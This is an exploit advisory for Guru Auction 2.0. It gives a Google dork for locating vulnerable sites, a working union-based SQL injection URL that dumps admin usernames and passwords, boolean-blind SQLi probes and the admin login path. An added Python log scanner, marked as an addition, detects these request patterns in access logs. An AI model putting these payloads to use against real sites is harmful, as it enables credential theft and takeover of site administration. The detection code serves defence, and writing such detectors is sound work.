Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false

Admin login page:
~~~~~~~~~~
http://domain.tld/[path]/admin/
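
Detection logic for the two request patterns above, as an added example that is not part of the original advisory: it flags access-log requests where `cate_id` or `item_id` is not a plain integer and labels union-based and boolean-blind attempts. The log lines, the `/shop/` path and the assumption that legitimate IDs are unsigned integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and ID parameters named in the advisory; assumed to be unsigned integers.
WATCHED = {"subcat.php": "cate_id", "detail.php": "item_id"}
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
BLIND_RE = re.compile(r"\b(?:and|or)\b.+(?:=|<|>|\blike\b)", re.I | re.S)
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(target):
    """Return None for a clean request, otherwise a finding label."""
    parts = urlsplit(target)
    param = WATCHED.get(parts.path.rsplit("/", 1)[-1].lower())
    if param is None:
        return None
    # parse_qs decodes %xx and '+' so encoded payloads are matched too.
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        if re.fullmatch(r"\d+", value.strip()):
            continue
        if UNION_RE.search(value):
            return "union-select"
        if BLIND_RE.search(value):
            return "boolean-blind"
        return "non-numeric-id"
    return None

def scan(lines):
    """Yield (client, status, label, target) for each suspicious log line."""
    for line in lines:
        m = LOG_RE.match(line)
        if m and (label := classify(m.group(2))):
            yield m.group(1), int(m.group(3)), label, m.group(2)

# Constructed sample in combined log format (documentation IPs, made-up path).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,null,null-- HTTP/1.1" 200 830',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 4410',
    '198.51.100.7 - - [01/Jan/2024:10:00:10 +0000] "GET /shop/detail.php?item_id=575%20and%201%3D2 HTTP/1.1" 200 1200',
    '192.0.2.33 - - [01/Jan/2024:10:00:12 +0000] "GET /shop/detail.php?item_id=575abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, status, label, target in scan(SAMPLE_LOG):
        print(f"{client} {status} {label:15} {target}")
```

A run of alternating true/false boolean probes from one client against `detail.php`, as in the blind PoC, is a stronger signal than any single hit, so group the findings by client before alerting.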